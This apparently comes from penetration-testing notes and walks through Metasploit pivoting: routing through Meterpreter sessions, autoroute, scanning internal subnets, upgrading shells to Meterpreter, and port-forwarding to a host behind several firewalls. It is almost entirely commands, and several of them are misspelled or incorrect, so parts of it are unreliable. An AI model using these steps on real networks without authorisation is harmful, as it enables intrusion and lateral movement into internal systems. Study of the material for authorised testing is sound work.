routing and other important networking concepts regarding PenTesting
ip route
route -nip route add <net_id>/<mask> via <net_getaway>meterpreter:
route add x.x.x.0/24 1 (this is the session you want this to add to)
route list
//You should see the route now.
//Then go back into your session by:
sessions -i 1Last updated
Was this helpful?
Was this helpful?
use auxilary/scanner/discovery/udp_prob
set RHOSTS <target_ip>
route add <target_ip>/24 1 //routing inside the seesion so it will send these udp probs following this routing rule
route print
set THREADS 20 //20 hosts at the same time
runinside a meterpreter session:
meterpreter> run autoroute -s <new_ip_found_inside_target>/24
meterpreter > run autoroute -p //print all routes
//now the routing is down inside a metasploite so lets scan the network using it
background
use auxiliary/scanner/netbios/nbname //for win env
set RHOSTS <new_net_ip>/24
run
// found a new ip time for port scanner for the new target
use auxiliary/scanner/portscan/tcp
set RHOSTS <new_TRAGET_Discovered_using_first_target_IP>
set THREADS 5
run
//then use another auxiliary to discover the ver for the specified deamon found
//ex:ftp
use auxiliary/scanner/ftp/ftp_version
st RHOSTS <new_TRAGET_Discovered_IP>
run
//then you can search for an exploit for that ftp banner
//then you would pobably get shell you can use to_meterpreter module
use post/multi/manage/shell_to_meterpreter
set LHOST <first_target_in_new_net_IP>
set session <shell_session_id>
run
//now you have a new session it's the meterpreter
session -i <new_meter_sessoin>
//then repeat the same thing with the new session
meterpreter> autoroute -s <2nd_target_ip_net>/24
background
route print
//assuming the 2nd target connected to
// a 3rd target that runs ion TCP:80
//you found the 3rd target
//by repeating steps above inside the 2nd target.
session -i <2nd_target_sesssion_id>
meterpreter > portfwd add -l 8888 -p 80 <third_target_ip>
//now you device can connect to 3rd target webapp
//(whichs was behind 3 FireWalls)
now inside your machine:
netstat -altp
will give you will see 0.0.0.0:8888 listening on ruby